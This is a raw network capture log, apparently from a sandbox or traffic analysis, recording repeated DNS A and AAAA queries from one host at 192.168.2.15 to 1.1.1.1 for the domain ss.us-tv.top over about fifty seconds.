Nov 2, 2024 04:05:00.821183920 CET	192.168.2.15	1.1.1.1	0x4b94	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:00.828284025 CET	192.168.2.15	1.1.1.1	0x4b94	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:00.828346968 CET	192.168.2.15	1.1.1.1	0xe9ba	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:00.839826107 CET	192.168.2.15	1.1.1.1	0x4b94	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:02.456511021 CET	192.168.2.15	1.1.1.1	0xba38	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:02.457371950 CET	192.168.2.15	1.1.1.1	0x4b28	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:02.463620901 CET	192.168.2.15	1.1.1.1	0xba38	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:02.464284897 CET	192.168.2.15	1.1.1.1	0x4b28	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:02.470839977 CET	192.168.2.15	1.1.1.1	0x4b28	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:03.604604959 CET	192.168.2.15	1.1.1.1	0x5048	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:03.604779959 CET	192.168.2.15	1.1.1.1	0x11cf	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:03.615355968 CET	192.168.2.15	1.1.1.1	0x11cf	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:03.615370989 CET	192.168.2.15	1.1.1.1	0x5048	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:03.622323036 CET	192.168.2.15	1.1.1.1	0x5048	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:04.755707026 CET	192.168.2.15	1.1.1.1	0x6911	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:04.757086039 CET	192.168.2.15	1.1.1.1	0x916d	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:04.762881041 CET	192.168.2.15	1.1.1.1	0x6911	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:04.764117002 CET	192.168.2.15	1.1.1.1	0x916d	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:05.778976917 CET	192.168.2.15	1.1.1.1	0x1f80	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:05.779088020 CET	192.168.2.15	1.1.1.1	0xa5dc	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:05.785773039 CET	192.168.2.15	1.1.1.1	0xa5dc	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:05.786068916 CET	192.168.2.15	1.1.1.1	0x1f80	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:06.801989079 CET	192.168.2.15	1.1.1.1	0x444b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:06.802239895 CET	192.168.2.15	1.1.1.1	0xe068	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:06.809259892 CET	192.168.2.15	1.1.1.1	0x444b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:06.809288979 CET	192.168.2.15	1.1.1.1	0xe068	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:07.828661919 CET	192.168.2.15	1.1.1.1	0xd7e0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:07.829641104 CET	192.168.2.15	1.1.1.1	0x9b68	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:07.836395979 CET	192.168.2.15	1.1.1.1	0xd7e0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:07.837832928 CET	192.168.2.15	1.1.1.1	0x9b68	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:08.853310108 CET	192.168.2.15	1.1.1.1	0xa439	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:08.853430033 CET	192.168.2.15	1.1.1.1	0x4e78	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:08.860565901 CET	192.168.2.15	1.1.1.1	0x4e78	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:08.865760088 CET	192.168.2.15	1.1.1.1	0xa439	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:09.880135059 CET	192.168.2.15	1.1.1.1	0x4a46	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:09.882970095 CET	192.168.2.15	1.1.1.1	0xec26	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:09.887111902 CET	192.168.2.15	1.1.1.1	0x4a46	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:09.889565945 CET	192.168.2.15	1.1.1.1	0xec26	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:09.896255970 CET	192.168.2.15	1.1.1.1	0xec26	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:11.033047915 CET	192.168.2.15	1.1.1.1	0x668f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:11.033442974 CET	192.168.2.15	1.1.1.1	0x452f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:11.040472031 CET	192.168.2.15	1.1.1.1	0x452f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:11.041127920 CET	192.168.2.15	1.1.1.1	0x668f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:11.047110081 CET	192.168.2.15	1.1.1.1	0x452f	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:12.180906057 CET	192.168.2.15	1.1.1.1	0xc139	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:12.181097984 CET	192.168.2.15	1.1.1.1	0xda52	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:12.187822104 CET	192.168.2.15	1.1.1.1	0xc139	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:12.188122034 CET	192.168.2.15	1.1.1.1	0xda52	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:13.205169916 CET	192.168.2.15	1.1.1.1	0xf4b2	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:13.205274105 CET	192.168.2.15	1.1.1.1	0x2e8e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:13.212416887 CET	192.168.2.15	1.1.1.1	0x2e8e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:13.212622881 CET	192.168.2.15	1.1.1.1	0xf4b2	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:13.219569921 CET	192.168.2.15	1.1.1.1	0xf4b2	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:14.355288982 CET	192.168.2.15	1.1.1.1	0x8099	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:14.355335951 CET	192.168.2.15	1.1.1.1	0x314b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:14.362104893 CET	192.168.2.15	1.1.1.1	0x314b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:14.362365007 CET	192.168.2.15	1.1.1.1	0x8099	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:15.380064964 CET	192.168.2.15	1.1.1.1	0x9104	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:15.380233049 CET	192.168.2.15	1.1.1.1	0x2222	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:15.387440920 CET	192.168.2.15	1.1.1.1	0x9104	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:15.387458086 CET	192.168.2.15	1.1.1.1	0x2222	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:15.394391060 CET	192.168.2.15	1.1.1.1	0x9104	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:16.536266088 CET	192.168.2.15	1.1.1.1	0xc589	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:16.536408901 CET	192.168.2.15	1.1.1.1	0xd477	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:16.543298006 CET	192.168.2.15	1.1.1.1	0xc589	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:16.543318987 CET	192.168.2.15	1.1.1.1	0xd477	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:17.561099052 CET	192.168.2.15	1.1.1.1	0x4887	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:17.562602043 CET	192.168.2.15	1.1.1.1	0x6926	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:17.568959951 CET	192.168.2.15	1.1.1.1	0x4887	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:17.569262028 CET	192.168.2.15	1.1.1.1	0x6926	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:18.586827993 CET	192.168.2.15	1.1.1.1	0x959f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:18.588803053 CET	192.168.2.15	1.1.1.1	0x35bb	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:18.594283104 CET	192.168.2.15	1.1.1.1	0x959f	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:18.596448898 CET	192.168.2.15	1.1.1.1	0x35bb	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:19.614443064 CET	192.168.2.15	1.1.1.1	0xf511	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:19.618824005 CET	192.168.2.15	1.1.1.1	0xd678	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:19.621642113 CET	192.168.2.15	1.1.1.1	0xf511	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:19.863851070 CET	192.168.2.15	1.1.1.1	0xd678	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:19.870769024 CET	192.168.2.15	1.1.1.1	0xd678	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:21.004348993 CET	192.168.2.15	1.1.1.1	0x8184	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:21.004715919 CET	192.168.2.15	1.1.1.1	0xdf14	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:21.011141062 CET	192.168.2.15	1.1.1.1	0x8184	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:21.011280060 CET	192.168.2.15	1.1.1.1	0xdf14	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:21.017875910 CET	192.168.2.15	1.1.1.1	0xdf14	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:22.155694962 CET	192.168.2.15	1.1.1.1	0x8ab6	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:22.155929089 CET	192.168.2.15	1.1.1.1	0x711a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:22.163028002 CET	192.168.2.15	1.1.1.1	0x8ab6	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:22.163050890 CET	192.168.2.15	1.1.1.1	0x711a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:23.185714006 CET	192.168.2.15	1.1.1.1	0x8c04	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:23.185936928 CET	192.168.2.15	1.1.1.1	0x75c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:23.192758083 CET	192.168.2.15	1.1.1.1	0x8c04	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:23.761487961 CET	192.168.2.15	1.1.1.1	0x75c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:24.781183958 CET	192.168.2.15	1.1.1.1	0x83c5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:24.781744003 CET	192.168.2.15	1.1.1.1	0xa16d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:24.788358927 CET	192.168.2.15	1.1.1.1	0xa16d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:24.788569927 CET	192.168.2.15	1.1.1.1	0x83c5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:25.807558060 CET	192.168.2.15	1.1.1.1	0xfec7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:25.807876110 CET	192.168.2.15	1.1.1.1	0xda74	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:25.814728022 CET	192.168.2.15	1.1.1.1	0xfec7	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:25.814959049 CET	192.168.2.15	1.1.1.1	0xda74	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:26.836092949 CET	192.168.2.15	1.1.1.1	0x6594	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:26.838943005 CET	192.168.2.15	1.1.1.1	0xe171	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:26.843533039 CET	192.168.2.15	1.1.1.1	0x6594	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:26.845868111 CET	192.168.2.15	1.1.1.1	0xe171	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:27.863394976 CET	192.168.2.15	1.1.1.1	0xc661	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:27.868117094 CET	192.168.2.15	1.1.1.1	0xf71b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:27.870831013 CET	192.168.2.15	1.1.1.1	0xc661	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:27.875375986 CET	192.168.2.15	1.1.1.1	0xf71b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:27.882505894 CET	192.168.2.15	1.1.1.1	0xf71b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:29.020670891 CET	192.168.2.15	1.1.1.1	0x7289	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:29.020967007 CET	192.168.2.15	1.1.1.1	0x5d7a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:29.028141022 CET	192.168.2.15	1.1.1.1	0x7289	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:29.109518051 CET	192.168.2.15	1.1.1.1	0x5d7a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:30.126491070 CET	192.168.2.15	1.1.1.1	0x114c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:30.126624107 CET	192.168.2.15	1.1.1.1	0x41ef	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:30.133706093 CET	192.168.2.15	1.1.1.1	0x114c	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:30.133718967 CET	192.168.2.15	1.1.1.1	0x41ef	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:31.151158094 CET	192.168.2.15	1.1.1.1	0xf443	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:31.152080059 CET	192.168.2.15	1.1.1.1	0x65c5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:31.158030033 CET	192.168.2.15	1.1.1.1	0xf443	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:31.159301043 CET	192.168.2.15	1.1.1.1	0x65c5	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:32.177814960 CET	192.168.2.15	1.1.1.1	0x8c46	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:32.178963900 CET	192.168.2.15	1.1.1.1	0x10d4	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:32.184927940 CET	192.168.2.15	1.1.1.1	0x8c46	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:32.186352968 CET	192.168.2.15	1.1.1.1	0x10d4	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:32.193233013 CET	192.168.2.15	1.1.1.1	0x10d4	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:33.330432892 CET	192.168.2.15	1.1.1.1	0xbbda	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:33.333771944 CET	192.168.2.15	1.1.1.1	0xaf16	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:33.337802887 CET	192.168.2.15	1.1.1.1	0xbbda	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:33.340951920 CET	192.168.2.15	1.1.1.1	0xaf16	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:34.356296062 CET	192.168.2.15	1.1.1.1	0xe465	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:34.356384993 CET	192.168.2.15	1.1.1.1	0x6282	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:34.362993956 CET	192.168.2.15	1.1.1.1	0xe465	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:34.363006115 CET	192.168.2.15	1.1.1.1	0x6282	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:35.380393982 CET	192.168.2.15	1.1.1.1	0x103d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:35.381093025 CET	192.168.2.15	1.1.1.1	0xe03a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:35.387871981 CET	192.168.2.15	1.1.1.1	0x103d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:35.388112068 CET	192.168.2.15	1.1.1.1	0xe03a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:36.406922102 CET	192.168.2.15	1.1.1.1	0x3cdc	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:36.407349110 CET	192.168.2.15	1.1.1.1	0xc378	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:36.414611101 CET	192.168.2.15	1.1.1.1	0xc378	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:36.499365091 CET	192.168.2.15	1.1.1.1	0x3cdc	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:37.518062115 CET	192.168.2.15	1.1.1.1	0xdc0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:37.518501997 CET	192.168.2.15	1.1.1.1	0x6501	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:37.525043964 CET	192.168.2.15	1.1.1.1	0xdc0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:37.525697947 CET	192.168.2.15	1.1.1.1	0x6501	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:38.541233063 CET	192.168.2.15	1.1.1.1	0xa58e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:38.541317940 CET	192.168.2.15	1.1.1.1	0xe142	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:38.548182964 CET	192.168.2.15	1.1.1.1	0xe142	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:38.629347086 CET	192.168.2.15	1.1.1.1	0xa58e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:38.636117935 CET	192.168.2.15	1.1.1.1	0xa58e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:39.768743038 CET	192.168.2.15	1.1.1.1	0x3b9a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:39.768958092 CET	192.168.2.15	1.1.1.1	0xf4d0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:39.775654078 CET	192.168.2.15	1.1.1.1	0x3b9a	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:39.775963068 CET	192.168.2.15	1.1.1.1	0xf4d0	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:40.795780897 CET	192.168.2.15	1.1.1.1	0x837b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:40.796210051 CET	192.168.2.15	1.1.1.1	0x22f3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:40.803900003 CET	192.168.2.15	1.1.1.1	0x837b	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:40.803910971 CET	192.168.2.15	1.1.1.1	0x22f3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:40.810597897 CET	192.168.2.15	1.1.1.1	0x22f3	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:41.946778059 CET	192.168.2.15	1.1.1.1	0x5bac	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:41.948044062 CET	192.168.2.15	1.1.1.1	0xd6aa	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:41.954001904 CET	192.168.2.15	1.1.1.1	0x5bac	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:41.954786062 CET	192.168.2.15	1.1.1.1	0xd6aa	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:42.969410896 CET	192.168.2.15	1.1.1.1	0x2b02	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:42.969800949 CET	192.168.2.15	1.1.1.1	0x2f6a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:42.976433039 CET	192.168.2.15	1.1.1.1	0x2b02	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:42.977401018 CET	192.168.2.15	1.1.1.1	0x2f6a	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:43.992177010 CET	192.168.2.15	1.1.1.1	0xfd82	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:43.992470026 CET	192.168.2.15	1.1.1.1	0x443b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:43.999228954 CET	192.168.2.15	1.1.1.1	0xfd82	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:43.999239922 CET	192.168.2.15	1.1.1.1	0x443b	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:45.017781019 CET	192.168.2.15	1.1.1.1	0x5e8e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:45.018649101 CET	192.168.2.15	1.1.1.1	0x3ec	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:45.024329901 CET	192.168.2.15	1.1.1.1	0x5e8e	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:45.025835991 CET	192.168.2.15	1.1.1.1	0x3ec	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:46.045211077 CET	192.168.2.15	1.1.1.1	0x443c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:46.045535088 CET	192.168.2.15	1.1.1.1	0xc4fa	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:46.053216934 CET	192.168.2.15	1.1.1.1	0x443c	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:46.053345919 CET	192.168.2.15	1.1.1.1	0xc4fa	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:47.068799019 CET	192.168.2.15	1.1.1.1	0xab9d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:47.069145918 CET	192.168.2.15	1.1.1.1	0x56ac	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:47.075978041 CET	192.168.2.15	1.1.1.1	0xab9d	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:47.076509953 CET	192.168.2.15	1.1.1.1	0x56ac	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:48.091964960 CET	192.168.2.15	1.1.1.1	0x2bf9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:48.092065096 CET	192.168.2.15	1.1.1.1	0x5d11	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:48.099241972 CET	192.168.2.15	1.1.1.1	0x5d11	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:48.099253893 CET	192.168.2.15	1.1.1.1	0x2bf9	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:49.116259098 CET	192.168.2.15	1.1.1.1	0xfc0	Standard query (0)	ss.us-tv.top	28	IN (0x0001)	false
Nov 2, 2024 04:05:49.116452932 CET	192.168.2.15	1.1.1.1	0x876e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
Nov 2, 2024 04:05:49.123368979 CET	192.168.2.15	1.1.1.1	0x876e	Standard query (0)	ss.us-tv.top	A (IP address)	IN (0x0001)	false
